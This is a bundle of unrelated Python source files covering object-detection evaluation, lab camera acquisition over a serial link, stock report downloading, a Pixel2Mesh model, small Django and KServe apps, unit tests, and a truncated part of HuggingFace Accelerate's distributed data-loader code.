import numpy as np def create_int_img(img): int_img = np.cumsum(img, axis=0) np.cumsum(int_img, axis=1, out=int_img) return int_img def drop_objects_in_igr(gt, det, img_height, img_width): gt_ignore_mask = gt[:, 5] == 0 curgt = gt[np.logical_not(gt_ignore_mask)] igr_region = gt[gt_ignore_mask, :4].clip(min=1) if len(igr_region): igr_map = np.zeros((img_height, img_width), dtype=np.int) for igr in igr_region: x1 = igr[0] y1 = igr[1] x2 = min(x1 + igr[2], img_width) y2 = min(y1 + igr[3], img_height) igr_map[y1 - 1:y2, x1 - 1:x2] = 1 int_igr_map = create_int_img(igr_map) idx_left_gt = [] for i, gtbox in enumerate(curgt): pos = np.round(gtbox[:4]).astype(np.int32).clip(min=1) x = max(1, min(img_width - 1, pos[0])) y = max(1, min(img_height - 1, pos[1])) w = pos[2] h = pos[3] tl = int_igr_map[y - 1, x - 1] tr = int_igr_map[y - 1, min(img_width, x + w) - 1] bl = int_igr_map[max(1, min(img_height, y + h)) - 1, x - 1] br = int_igr_map[max(1, min(img_height, y + h)) - 1, min(img_width, x + w) - 1] igr_val = tl + br - tr - bl if igr_val / (h * w) < 0.5: idx_left_gt.append(i) curgt = curgt[idx_left_gt] idx_left_det = [] for i, dtbox in enumerate(det): pos = np.round(dtbox[:4]).astype(np.int32).clip(min=1) x = max(1, min(img_width - 1, pos[0])) y = max(1, min(img_height - 1, pos[1])) w = pos[2] h = pos[3] tl = int_igr_map[y - 1, x - 1] tr = int_igr_map[y - 1, min(img_width, x + w) - 1] bl = int_igr_map[max(1, min(img_height, y + h)) - 1, x - 1] br = int_igr_map[max(1, min(img_height, y + h)) - 1, min(img_width, x + w) - 1] igr_val = tl + br - tr - bl if igr_val / (h * w) < 0.5: idx_left_det.append(i) det = det[idx_left_det] return curgt, det
# -*- coding: utf-8 -*- """ Created on Fri Sep 28 14:20:44 2018 @author: Evangelos Tzardis """ from time import sleep, time import serial import mylibrary as mlb import rw_config as cfg import numpy as np import imageio import os #def init_camera(): # settings = ['acquisition mode','continuous',\ # 'pixel format','mono16',\ # 'exposure auto','off',\ # 'exposure time', '396',\ # 'width','84',\ # 'height','22',\ # 'offset x','508',\ # 'offset y','546',\ # 'trigger mode','on',\ # 'trigger source','software'] # cfg.write_config(settings) # cam_num = 0 # # # Init camera, set configurations # cam_nodes = mlb.run_camera(cam_num) # # return cam_nodes def init_camera(): # read config file config_with = 'IMAGE SEQUENCE CONFIGURATION' config_with_enum = 1 section = cfg.load_config(config_with) section = section[0] keys = ['height','width'] settings = [ section[key] for key in keys ] # Init camera, set configurations cam_num = 0 nodes = mlb.run_camera(cam_num, config_with_enum) return [nodes, settings] def encode_int2fixednumbytes(number): max_num = 5 enc = str(number)+'\n' while len(enc) < max_num: enc = '0' + enc return str.encode(enc) cam_nodes, cam_settings = init_camera() cam = cam_nodes[0] mode = input('Enter \'c\' for calibration or \'m\' for measurement...') while(mode != 'c' and mode != 'm'): mode = input('Enter \'c\' for calibration or \'m\' for measurement...') #input('Capture sample illuminance: Enter when ready...') #Is = mlb.trigger_image_acquisition(cam_nodes) #Is = gaussian_filter(Is, sigma=5) # #input('Capture reference illuminance: Enter when ready...') #Ir = mlb.trigger_image_acquisition(cam_nodes) #Ir = gaussian_filter(Ir, sigma=5) # #input('Capture background illuminance: Enter when ready...') #Ib = mlb.trigger_image_acquisition(cam_nodes) #Ib = gaussian_filter(Ib, sigma=5) if mode == 'c': subfolder = '\\images_calibration' elif mode == 'm': subfolder = '\\images_measurement' folder = os.path.dirname(os.path.realpath(__file__)) + subfolder + '\\stack' folder_srb = folder + '\\IsIrIb' if not os.path.exists(folder): os.makedirs(folder) if not os.path.exists(folder_srb): os.makedirs(folder_srb) #imageio.imsave(folder_srb + '\\Is.tiff', Is) #imageio.imsave(folder_srb + '\\Ir.tiff', Ir) #imageio.imsave(folder_srb + '\\Ib.tiff', Ib) input('Enter to continue...') ser = serial.Serial('COM4', 9600) # Establish the connection on a specific port sleep(4) max_steps = 4096 # minimum step: 1 mV, maximum step: 4096 mV steps = 600 increment = round(max_steps/steps) ser.write(encode_int2fixednumbytes(steps)) # Send number of steps to arduino ser.flush() ser.write(encode_int2fixednumbytes(increment)) # Send voltage increment to arduino ser.flush() # rounding of increment may lead to extra steps extra = (increment*steps - max_steps)//increment extra = extra if extra > 0 else 0 # arbitrarily omit a few of the first images, since PZT is oscillating # at the beginning omit = 5 rows = mlb.correct_type(cam_settings[0]) # Look at init_camera() --> keys cols = mlb.correct_type(cam_settings[1]) height = steps-extra-omit-1 image_stack = np.zeros([height, rows, cols]) #t1 = np.zeros(steps-extra) #t2 = np.zeros(steps-extra) #t3 = np.zeros(steps-extra) #t4 = np.zeros(steps-extra) #t5 = np.zeros(steps-extra) ts = time() mlb.begin_acquisition(cam) for i in range(steps-extra): # ts1 = time() rvalue = ser.readline().split(b'\r')[0] # t1[i] = time() - ts1 # ts2 = time() print(rvalue) # t2[i] = time() - ts2 # ts3 = time() if i+1 > omit: image_stack[i-omit-1] = mlb.grab_next_image_by_trigger(cam) # image_stack[i] = mlb.trigger_image_acquisition(cam_nodes) # t3[i] = time() - ts3 # ts4 = time() ser.write(b'ok\n') # t4[i] = time() - ts4 # ts5 = time() ser.flush() # t5[i] = time() - ts5 t = time() - ts del cam mlb.end_acquisition(cam_nodes) ser.close() # SAVE IMAGES TO DISK for j in range(height): fn = '\\' + str(j) + '.tiff' imageio.imsave(folder + fn, image_stack[j])
# -*- coding: utf-8 -*- import urllib3 import pandas as pd import os # if DOWNLOAD = False,don't download report DOWNLOAD=True def download_report(code): """ 下载报表(利润表年表,如果下载其他报表,需要修改url Arguments: code: 股票代码 """ # 利润表(年表) url = f"http://quotes.money.163.com/service/lrb_{code}.html?type=year" base_dir='data' if not os.path.exists(base_dir): os.makedirs(base_dir) report_file = f'{base_dir}/lrb_{code}.csv' http = urllib3.PoolManager() response = http.request('GET', url) with open(report_file, 'wb') as f: # 163网页的编码是gbk,需要转成utf-8 f.write(response.data.decode('gbk').encode('utf-8')) # 默认获取研发费用,修改row可以获取其他资料 def each_record(codes, years, row='研发费用(万元)'): for code in codes: filename = f'data/lrb_{code}.csv' df = pd.read_csv(filename, index_col=0) x = df.loc[row, years] yield [code] + list(x) if __name__ == '__main__': # 测试股票代码集合 codes = ['603730', '603757'] years = ['2018-12-31', '2017-12-31'] for code in codes: if DOWNLOAD == True: print(f"downloading report:{code}") download_report(code) summary = pd.DataFrame.from_records(each_record(codes, years), columns=['code'] + years) summary.to_csv('summary.csv', index=False)
# Copyright (C) 2019 Chao Wen, Yinda Zhang, Zhuwen Li, Yanwei Fu # All rights reserved. # This code is licensed under BSD 3-Clause License. import tensorflow as tf import tflearn import os import tensorflow.contrib.layers as tfcontriblayers from modules.losses import mesh_loss, laplace_loss from modules.layers import GraphConvolution, GraphPooling, GraphProjection class Model(object): def __init__(self, **kwargs): allowed_kwargs = {'name', 'logging', 'suffix'} for kwarg in kwargs.keys(): assert kwarg in allowed_kwargs, 'Invalid keyword argument: ' + kwarg name = kwargs.get('name') if not name: name = self.__class__.__name__.lower() self.name = name logging = kwargs.get('logging', False) self.logging = logging save_dir_suffix = kwargs.get('suffix', '') self.save_dir_suffix = save_dir_suffix self.vars = {} self.placeholders = {} self.layers = [] self.activations = [] self.inputs = None self.output1 = None self.output2 = None self.output3 = None self.output1_2 = None self.output2_2 = None self.loss = 0 self.inc_loss = 0 self.pose_loss = 0 self.optimizer = None self.optimizer_inc = None self.opt_op_vp = None self.opt_op_vi = None self.opt_op = None self.summary = None def _build(self): raise NotImplementedError def build(self): raise NotImplementedError def forward(self): raise NotImplementedError def predict(self): raise NotImplementedError def _loss(self): raise NotImplementedError def save(self, sess=None, ckpt_path=None, step=None): if not sess: raise AttributeError('TensorFlow session not provided.') saver = tf.train.Saver(self.vars, max_to_keep=0) save_path = saver.save(sess, os.path.join(ckpt_path, '{}.ckpt'.format(self.name)), global_step=step) print('Model saved in file: {}, epoch {}'.format(save_path, step)) def load(self, sess=None, ckpt_path=None, step=None): if not sess: raise AttributeError('TensorFlow session not provided.') # print(self.vars) saver = tf.train.Saver(self.vars) save_path = os.path.join(ckpt_path, '{}.ckpt-{}'.format(self.name, step)) saver.restore(sess, save_path) print('Model restored from file: {}, epoch {}'.format(save_path, step)) class MeshNetMVP2M(Model): def __init__(self, placeholders, args, **kwargs): super(MeshNetMVP2M, self).__init__(**kwargs) self.inputs = placeholders['features'] self.placeholders = placeholders self.args = args self.optimizer = tf.train.AdamOptimizer(learning_rate=self.args.lr) self.summary_loss = None self.merged_summary_op = None self.build() def _loss(self): # Pixel2mesh loss self.loss += mesh_loss(self.output1, self.placeholders, 1) self.loss += mesh_loss(self.output2, self.placeholders, 2) self.loss += mesh_loss(self.output3, self.placeholders, 3) self.loss += laplace_loss(self.inputs, self.output1, self.placeholders, 1) self.loss += laplace_loss(self.output1_2, self.output2, self.placeholders, 2) self.loss += laplace_loss(self.output2_2, self.output3, self.placeholders, 3) # Weight decay loss conv_layers = list(range(1, 15)) + list(range(17, 31)) + list(range(33, 48)) for layer_id in conv_layers: for var in self.layers[layer_id].vars.values(): self.loss += 5e-6 * tf.nn.l2_loss(var) def _build(self): with tf.name_scope('pixel2mesh'): self.build_cnn18() # update image feature # first project block self.layers.append(GraphProjection(placeholders=self.placeholders, name='graph_proj_1_layer_0')) self.layers.append(GraphConvolution(input_dim=self.args.feat_dim, output_dim=self.args.hidden_dim, gcn_block_id=1, placeholders=self.placeholders, name='graph_conv_blk1_1_layer_1', logging=self.logging)) for _ in range(12): self.layers.append(GraphConvolution(input_dim=self.args.hidden_dim, output_dim=self.args.hidden_dim, gcn_block_id=1, placeholders=self.placeholders, name='graph_conv_blk1_{}_layer_{}'.format(2 + _, 2 + _), logging=self.logging)) # activation #15; layer #14; output 1 self.layers.append(GraphConvolution(input_dim=self.args.hidden_dim, output_dim=self.args.coord_dim, act=lambda x: x, gcn_block_id=1, placeholders=self.placeholders, name='graph_conv_blk1_14_layer_14', logging=self.logging)) # second project block self.layers.append(GraphProjection(placeholders=self.placeholders, name='graph_proj_2_layer_15')) self.layers.append(GraphPooling(placeholders=self.placeholders, pool_id=1, name='graph_pool_1to2_layer_16')) self.layers.append(GraphConvolution(input_dim=self.args.feat_dim + self.args.hidden_dim, output_dim=self.args.hidden_dim, gcn_block_id=2, placeholders=self.placeholders, name='graph_conv_blk2_1_layer_17', logging=self.logging)) for _ in range(12): self.layers.append(GraphConvolution(input_dim=self.args.hidden_dim, output_dim=self.args.hidden_dim, gcn_block_id=2, placeholders=self.placeholders, name='graph_conv_blk2_{}_layer_{}'.format(2 + _, 18 + _), logging=self.logging)) self.layers.append(GraphConvolution(input_dim=self.args.hidden_dim, output_dim=self.args.coord_dim, act=lambda x: x, gcn_block_id=2, placeholders=self.placeholders, name='graph_conv_blk2_14_layer_30', logging=self.logging)) # third project block self.layers.append(GraphProjection(placeholders=self.placeholders, name='graph_proj_3_layer_31')) self.layers.append(GraphPooling(placeholders=self.placeholders, pool_id=2, name='graph_pool_2to3_layer_32')) self.layers.append(GraphConvolution(input_dim=self.args.feat_dim + self.args.hidden_dim, output_dim=self.args.hidden_dim, gcn_block_id=3, placeholders=self.placeholders, name='graph_conv_blk3_1_layer_33', logging=self.logging)) for _ in range(13): self.layers.append(GraphConvolution(input_dim=self.args.hidden_dim, output_dim=self.args.hidden_dim, gcn_block_id=3, placeholders=self.placeholders, name='graph_conv_blk3_{}_layer_{}'.format(2 + _, 34 + _), logging=self.logging)) self.layers.append(GraphConvolution(input_dim=self.args.hidden_dim, output_dim=self.args.coord_dim, act=lambda x: x, gcn_block_id=3, placeholders=self.placeholders, name='graph_conv_blk3_15_layer_47', logging=self.logging)) def build_cnn18(self): x = self.placeholders['img_inp'] # x = tf.expand_dims(x, 0) # 224 224 x = tflearn.layers.conv.conv_2d(x, 16, (3, 3), strides=1, activation='relu', weight_decay=1e-5, regularizer='L2', scope='cnn/conv2d_1') x = tflearn.layers.conv.conv_2d(x, 16, (3, 3), strides=1, activation='relu', weight_decay=1e-5, regularizer='L2', scope='cnn/conv2d_2') x0 = x x = tflearn.layers.conv.conv_2d(x, 32, (3, 3), strides=2, activation='relu', weight_decay=1e-5, regularizer='L2', scope='cnn/conv2d_3') # 112 112 x = tflearn.layers.conv.conv_2d(x, 32, (3, 3), strides=1, activation='relu', weight_decay=1e-5, regularizer='L2', scope='cnn/conv2d_4') x = tflearn.layers.conv.conv_2d(x, 32, (3, 3), strides=1, activation='relu', weight_decay=1e-5, regularizer='L2', scope='cnn/conv2d_5') x1 = x x = tflearn.layers.conv.conv_2d(x, 64, (3, 3), strides=2, activation='relu', weight_decay=1e-5, regularizer='L2', scope='cnn/conv2d_6') # 56 56 x = tflearn.layers.conv.conv_2d(x, 64, (3, 3), strides=1, activation='relu', weight_decay=1e-5, regularizer='L2', scope='cnn/conv2d_7') x = tflearn.layers.conv.conv_2d(x, 64, (3, 3), strides=1, activation='relu', weight_decay=1e-5, regularizer='L2', scope='cnn/conv2d_8') x2 = x x = tflearn.layers.conv.conv_2d(x, 128, (3, 3), strides=2, activation='relu', weight_decay=1e-5, regularizer='L2', scope='cnn/conv2d_9') # 28 28 x = tflearn.layers.conv.conv_2d(x, 128, (3, 3), strides=1, activation='relu', weight_decay=1e-5, regularizer='L2', scope='cnn/conv2d_10') x = tflearn.layers.conv.conv_2d(x, 128, (3, 3), strides=1, activation='relu', weight_decay=1e-5, regularizer='L2', scope='cnn/conv2d_11') x3 = x x = tflearn.layers.conv.conv_2d(x, 256, (5, 5), strides=2, activation='relu', weight_decay=1e-5, regularizer='L2', scope='cnn/conv2d_12') # 14 14 x = tflearn.layers.conv.conv_2d(x, 256, (3, 3), strides=1, activation='relu', weight_decay=1e-5, regularizer='L2', scope='cnn/conv2d_13') x = tflearn.layers.conv.conv_2d(x, 256, (3, 3), strides=1, activation='relu', weight_decay=1e-5, regularizer='L2', scope='cnn/conv2d_14') x4 = x x = tflearn.layers.conv.conv_2d(x, 512, (5, 5), strides=2, activation='relu', weight_decay=1e-5, regularizer='L2', scope='cnn/conv2d_15') # 7 7 x = tflearn.layers.conv.conv_2d(x, 512, (3, 3), strides=1, activation='relu', weight_decay=1e-5, regularizer='L2', scope='cnn/conv2d_16') x = tflearn.layers.conv.conv_2d(x, 512, (3, 3), strides=1, activation='relu', weight_decay=1e-5, regularizer='L2', scope='cnn/conv2d_17') x = tflearn.layers.conv.conv_2d(x, 512, (3, 3), strides=1, activation='relu', weight_decay=1e-5, regularizer='L2', scope='cnn/conv2d_18') x5 = x # updata image feature self.placeholders.update({'img_feat': [tf.squeeze(x2), tf.squeeze(x3), tf.squeeze(x4), tf.squeeze(x5)]}) self.loss += tf.add_n(tf.get_collection(tf.GraphKeys.REGULARIZATION_LOSSES)) * 0.3 def build(self): ''' Wrapper for _build() ''' with tf.variable_scope(self.name): self._build() # Build sequential resnet model eltwise = [3, 5, 7, 9, 11, 13, 19, 21, 23, 25, 27, 29, 35, 37, 39, 41, 43, 45] concat = [15, 31] # proj = [0, 15, 31] self.activations.append(self.inputs) for idx, layer in enumerate(self.layers[:48]): hidden = layer(self.activations[-1]) if idx in eltwise: hidden = tf.add(hidden, self.activations[-2]) * 0.5 if idx in concat: hidden = tf.concat([hidden, self.activations[-2]], 1) self.activations.append(hidden) self.output1 = self.activations[15] unpool_layer = GraphPooling(placeholders=self.placeholders, pool_id=1) self.output1_2 = unpool_layer(self.output1) self.output2 = self.activations[31] unpool_layer = GraphPooling(placeholders=self.placeholders, pool_id=2) self.output2_2 = unpool_layer(self.output2) self.output3 = self.activations[48] # Store model variables for easy access variables = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope=self.name+'/') self.vars = {var.name: var for var in variables} # Build metrics self._loss() self.opt_op = self.optimizer.minimize(self.loss) self.summary_loss = tf.summary.scalar('loss', self.loss) self.merged_summary_op = tf.summary.merge([self.summary_loss])
from tkinter import * def fill_list_scrollbar(items): top = Tk() top.geometry('1024x400') top.title('Relação de e-mails que foram enviados') sb = Scrollbar(top) sb.pack(side = RIGHT, fill = Y) mylist = Listbox(top, yscrollcommand = sb.set, width='1024', height='400') for line in items: mylist.insert(END, line) mylist.pack(side = LEFT) sb.config(command = mylist.yview)
def timed_func(f, args=(), kwargs=None, timeout=30, default=None, errormsg="Timeout error"): # Since kwargs are mutable, assume they don't exist via optional arguments. If they do in fact exist, # they will exist in this context and be assigned. Otherwise, set to an empty dict and proceed. kwargs = kwargs or {} import signal class TimeoutError(Exception): pass def timeout_handler(signum, frame): raise TimeoutError # Register a signal to our handler signal.signal(signal.SIGALRM, timeout_handler) # Trigger an alarm after timeout seconds signal.alarm(timeout) # Try a function call: # If it returns normally before the timeout, pass along the value # Otherwise, print the specific error and return the default value try: result = f(*args, **kwargs) except TimeoutError: result = default print(errormsg) finally: signal.alarm(0) return result # Silly function that never returns def forever(): import time while True: time.sleep(1) # Function that may or may not complete depending on the timeout def andever(a,b): result = a while True: result += b #if result > 200000000: if result > 100000000: return result # Test print(timed_func(forever, timeout=2, default="no response", errormsg="failed to update")) print(timed_func(andever, (1,2), timeout=5, default=-1, errormsg="computation timeout"))
import unittest from ratings.ratings import elo_rating class TestRatings(unittest.TestCase): def test_elo_rating(self): p1_rating = 1200 p2_rating = 1000 K = 32 ratings_if_p1_wins = elo_rating(p1_rating, p2_rating, K, True) expected_ratings_p1_wins = (1208, 992) self.assertEqual(ratings_if_p1_wins, expected_ratings_p1_wins) ratings_if_p2_wins = elo_rating(p1_rating, p2_rating, K, False) expected_ratings_p2_wins = (1176, 1024) self.assertEqual(ratings_if_p2_wins, expected_ratings_p2_wins) if __name__ == '__main__': unittest.main()
# # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import argparse import kserve from .driver_transformer import DriverTransformer import logging logging.basicConfig(level=kserve.constants.KSERVE_LOGLEVEL) DEFAULT_MODEL_NAME = "sklearn-driver-transformer" parser = argparse.ArgumentParser(parents=[kserve.kfserver.parser]) parser.add_argument( "--predictor_host", help="The URL for the model predict function", required=True ) parser.add_argument( "--model_name", default=DEFAULT_MODEL_NAME, help='The name that the model is served under.') parser.add_argument( "--feast_serving_url", type=str, help="The url of the Feast Serving Service.", required=True) parser.add_argument( "--entity_ids", type=str, nargs="+", help="A list of entity ids to use as keys in the feature store.", required=True) parser.add_argument( "--feature_refs", type=str, nargs="+", help="A list of features to retrieve from the feature store.", required=True) args, _ = parser.parse_known_args() if __name__ == "__main__": transformer = DriverTransformer( name=args.model_name, predictor_host=args.predictor_host, feast_serving_url=args.feast_serving_url, entity_ids=args.entity_ids, feature_refs=args.feature_refs) kfserver = kserve.KFServer() kfserver.start(models=[transformer])
from django.shortcuts import render from django.contrib.auth.models import User # Create your views here. def index(request): print(request.user) if request.user.is_authenticated: social = request.user.social_auth.get(provider='fitbit') token = social.extra_data['access_token'] print(token) return render(request, 'temp/index.html') # https://www.fitbit.com/oauth2/authorize?client_id=22D3H4&redirect_uri=http://localhost:8000/complete/fitbit/&state=dqOuEqrXhT7nxrTyxK0fpGvgOklUQDo2&response_type=code&scope=activity+heartrate+profile+sleep+weight+profile
from django.urls import path, re_path from django.contrib.sitemaps.views import sitemap from blog.sitemaps import BlogSitemap from blog.views import ( BlogDetailView, BlogIndexView, BlogPostsRssFeed, BlogPostsAtomFeed, ) urlpatterns = [ # blog urls path("", BlogIndexView.as_view(), name="blog"), re_path(r"^(?P<slug>[-\w]+)/$", BlogDetailView.as_view(), name="blog_detail"), # rss & atom feed path("feed/rss/", BlogPostsRssFeed(), name="blog_rss_feed"), path("feed/atom/", BlogPostsAtomFeed(), name="blog_atom_feed"), # sitemap re_path( r"^sitemap\.xml$", sitemap, {"sitemaps": {"blog": BlogSitemap()}}, name="blog_sitemap", ), ]
import unittest import numpy as np import rlcard from rlcard.agents import RandomAgent from .determism_util import is_deterministic class TestVecEnv(unittest.TestCase): def test_vec_env(self): env = rlcard.make('limit-holdem', config={'env_num': 4}) env.set_agents([RandomAgent(env.action_num) for _ in range(env.player_num)]) trajectories, payoffs = env.run(is_training=False) self.assertEqual(len(payoffs), 4) trajectories, payoffs = env.run(is_training=True) if __name__ == '__main__': unittest.main()
# -*- coding: utf-8 -*- def foo(): pass print foo()
# Copyright 2021 The HuggingFace Team. All rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from typing import Optional import torch from torch.utils.data import BatchSampler, DataLoader, IterableDataset from packaging import version from .state import AcceleratorState, DistributedType, is_tpu_available from .utils import send_to_device, synchronize_rng_states if is_tpu_available(): import torch_xla.core.xla_model as xm # kwargs of the DataLoader in min version 1.4.0. _PYTORCH_DATALOADER_KWARGS = { "batch_size": 1, "shuffle": False, "sampler": None, "batch_sampler": None, "num_workers": 0, "collate_fn": None, "pin_memory": False, "drop_last": False, "timeout": 0, "worker_init_fn": None, "multiprocessing_context": None, } # kwargs added after by version _PYTORCH_DATALOADER_ADDITIONAL_KWARGS = { "1.6.0": {"generator": None}, "1.7.0": {"prefetch_factor": 2, "persistent_workers": False}, } for v, additional_kwargs in _PYTORCH_DATALOADER_ADDITIONAL_KWARGS.items(): if version.parse(torch.__version__) >= version.parse(v): _PYTORCH_DATALOADER_KWARGS.update(additional_kwargs) class BatchSamplerShard(BatchSampler): """ Wraps a PyTorch :obj:`BatchSampler` to generate batches for one of the processes only. Instances of this class will always yield a number of batches that is a round multiple of :obj:`num_processes` and that all have the same size. Depending on the value of the :obj:`drop_last` attribute of the batch sampler passed, it will either stop the iteration at the first batch that would be too small / not present on all processes or loop with indices from the beginning. Args: batch_sampler (:obj:`torch.utils.data.sampler.BatchSampler`): The batch sampler to split in several shards. num_processes (:obj:`int`, `optional`, defaults to 1): The number of processes running concurrently. process_index (:obj:`int`, `optional`, defaults to 0): The index of the current process. split_batches (:obj:`bool`, `optional`, defaults to :obj:`False`): Whether the shards should be created by splitting a batch to give a piece of it on each process, or by yielding different full batches on each process. On two processes with a sampler of :obj:`[[0, 1, 2, 3], [4, 5, 6, 7]]`, this will result in: - the sampler on process 0 to yield :obj:`[0, 1, 2, 3]` and the sampler on process 1 to yield :obj:`[4, 5, 6, 7]` if this argument is set to :obj:`False`. - the sampler on process 0 to yield :obj:`[0, 1]` then :obj:`[4, 5]` and the sampler on process 1 to yield :obj:`[2, 3]` then :obj:`[6, 7]` if this argument is set to :obj:`True`. .. warning:: This does not support :obj:`BatchSampler` with varying batch size yet. """ def __init__( self, batch_sampler: BatchSampler, num_processes: int = 1, process_index: int = 0, split_batches: bool = False, ): if split_batches and batch_sampler.batch_size % num_processes != 0: raise ValueError( f"To use `BatchSamplerShard` in `split_batches` mode, the batch size ({batch_sampler.batch_size}) " f"needs to be a round multiple of the number of processes ({num_processes})." ) self.batch_sampler = batch_sampler self.num_processes = num_processes self.process_index = process_index self.split_batches = split_batches self.batch_size = batch_sampler.batch_size self.drop_last = batch_sampler.drop_last def __len__(self): if len(self.batch_sampler) % self.num_processes == 0: return len(self.batch_sampler) // self.num_processes length = len(self.batch_sampler) // self.num_processes return length if self.drop_last else length + 1 def __iter__(self): return self._iter_with_split() if self.split_batches else self._iter_with_no_split() def _iter_with_split(self): initial_data = [] batch_length = self.batch_sampler.batch_size // self.num_processes for idx, batch in enumerate(self.batch_sampler): if idx == 0: initial_data = batch if len(batch) == self.batch_size: # If the batch is full, we yield the part of it this process is responsible of. yield batch[batch_length * self.process_index : batch_length * (self.process_index + 1)] # If drop_last is True of the last batch was full, iteration is over, otherwise... if not self.drop_last and len(initial_data) > 0 and len(batch) < self.batch_size: # For degenerate cases where the dataset has less than num_process * batch_size samples while len(initial_data) < self.batch_size: initial_data += initial_data batch = batch + initial_data yield batch[batch_length * self.process_index : batch_length * (self.process_index + 1)] def _iter_with_no_split(self): initial_data = [] batch_to_yield = [] for idx, batch in enumerate(self.batch_sampler): # We gather the initial indices in case we need to circle back at the end. if not self.drop_last and idx < self.num_processes: initial_data += batch # We identify the batch to yield but wait until we ar sure every process gets a full batch before actually # yielding it. if idx % self.num_processes == self.process_index: batch_to_yield = batch if idx % self.num_processes == self.num_processes - 1 and len(batch) == self.batch_size: yield batch_to_yield batch_to_yield = [] # If drop_last is True, iteration is over, otherwise... if not self.drop_last and len(initial_data) > 0: # ... we yield the complete batch we had saved before if it has the proper length if len(batch_to_yield) == self.batch_size: yield batch_to_yield # For degenerate cases where the dataset has less than num_process * batch_size samples while len(initial_data) < self.num_processes * self.batch_size: initial_data += initial_data # If the last batch seen was of the proper size, it has been yielded by its process so we move to the next if len(batch) == self.batch_size: batch = [] idx += 1 # Make sure we yield a multiple of self.num_processes batches cycle_index = 0 while idx % self.num_processes != 0 or len(batch) > 0: end_index = cycle_index + self.batch_size - len(batch) batch += initial_data[cycle_index:end_index] if idx % self.num_processes == self.process_index: yield batch cycle_index = end_index batch = [] idx += 1 class IterableDatasetShard(IterableDataset): """ Wraps a PyTorch :obj:`IterableDataset` to generate samples for one of the processes only. Instances of this class will always yield a number of samples that is a round multiple of the actual batch size (depending of the value of :obj:`split_batches`, this is either :obj:`batch_size` or :obj:`batch_size x num_processes`). Depending on the value of the :obj:`drop_last` attribute of the batch sampler passed, it will either stop the iteration at the first batch that would be too small or loop with indices from the beginning. Args: dataset (:obj:`torch.utils.data.dataset.IterableDataset`): The batch sampler to split in several shards. batch_size (:obj:`int`, `optional`, defaults to 1): The size of the batches per shard (if :obj:`split_batches=False`) or the size of the batches (if :obj:`split_batches=True`). drop_last (:obj:`bool`, `optional`, defaults to :obj:`False`): Whether or not to drop the last incomplete batch or complete the last batches by using the samples from the beginning. num_processes (:obj:`int`, `optional`, defaults to 1): The number of processes running concurrently. process_index (:obj:`int`, `optional`, defaults to 0): The index of the current process. split_batches (:obj:`bool`, `optional`, defaults to :obj:`False`): Whether the shards should be created by splitting a batch to give a piece of it on each process, or by yielding different full batches on each process. On two processes with an iterable dataset yielding of :obj:`[0, 1, 2, 3, 4, 5, 6, 7]`, this will result in: - the shard on process 0 to yield :obj:`[0, 1, 2, 3]` and the shard on process 1 to yield :obj:`[4, 5, 6, 7]` if this argument is set to :obj:`False`. - the shard on process 0 to yield :obj:`[0, 1, 4, 5]` and the sampler on process 1 to yield :obj:`[2, 3, 6, 7]` if this argument is set to :obj:`True`. """ def __init__( self, dataset: IterableDataset, batch_size: int = 1, drop_last: bool = False, num_processes: int = 1, process_index: int = 0, split_batches: bool = False, ): if split_batches and batch_size % num_processes != 0: raise ValueError( f"To use `IterableDatasetShard` in `split_batches` mode, the batch size ({batch_size}) " f"needs to be a round multiple of the number of processes ({num_processes})." ) self.dataset = dataset self.batch_size = batch_size self.drop_last = drop_last self.num_processes = num_processes self.process_index = process_index self.split_batches = split_batches def __iter__(self): real_batch_size = self.batch_size if self.split_batches else (self.batch_size * self.num_processes) process_batch_size = (self.batch_size // self.num_processes) if self.split_batches else self.batch_size process_slice = range(self.process_index * process_batch_size, (self.process_index + 1) * process_batch_size) first_batch = None current_batch = [] for element in self.dataset: current_batch.append(element) # Wait to have a full batch before yielding elements. if len(current_batch) == real_batch_size: for i in process_slice: yield current_batch[i] if first_batch is None: first_batch = current_batch.copy() current_batch = [] # Finished if drop_last is True, otherwise complete the last batch with elements from the beginning. if not self.drop_last and len(current_batch) > 0: if first_batch is None: first_batch = current_batch.copy() while len(current_batch) < real_batch_size: current_batch += first_batch for i in process_slice: yield current_batch[i] class DataLoaderShard(DataLoader): """ Subclass of a PyTorch :obj:`DataLoader` that will deal with device placement and current distributed setup. Args: dataset (:obj:`torch.utils.data.dataset.Dataset`): The dataset to use to build this datalaoder. device (:obj:`torch.device`, `optional`): If passed, the device to put all batches on. kwargs: All other keyword arguments to pass to the regular :obj:`DataLoader` initialization. """ def __init__(self, dataset, device=None, **kwargs): super().__init__(dataset, **kwargs) self.device = device def __iter__(self): synchronize_rng_states() state = AcceleratorState() for batch in super().__iter__(): if state.distributed_type == DistributedType.TPU: xm.mark_step() yield batch if self.device is None else send_to_device(batch, self.device) def prepare_data_loader( dataloader: DataLoader, device: Optional[torch.device] = None, num_processes: Optional[int] = None, process_index: Optional[int] = None, split_batches: bool = False, put_on_device: bool = False, ) -> DataLoader: """ Wraps a PyTorch :obj:`DataLoader` to generate batches for one of the processes only. Depending on the value of the :obj:`drop_last` attribute of the :obj:`dataloader` passed, it will either stop the iteration at the first batch that would be too small / not present on all processes or loop with indices from the beginning. Args: dataloader (:obj:`torch.utils.data.dataloader.DataLoader`): The data loader to split across several devices. device (:obj:`torch.device`): The target device for the returned :obj:`DataLoader`. num_processes (:obj:`int`, `optional`): The number of processes running concurrently. Will default to the value given by :class:`~accelerate.AcceleratorState`. process_index (:obj:`int`, `optional`): The index of the current process. Will default to the value given by :class:`~accelerate.AcceleratorState`. split_batches (:obj:`bool`, `optional`, defaults to :obj:`False`): Whether the resulting :obj:`DataLoader` should split the batches of the original data loader across devices or yield full batches (in which case it will yield batches starting at the :obj:`process_index`-th and advancing of :obj:`num_processes` batches at each iteration). Another way to see this is that the observed batch size will be the same as the initial :obj:`dataloader` if this option is set to :obj:`True`, the batch size of the initial :obj:`dataloader` 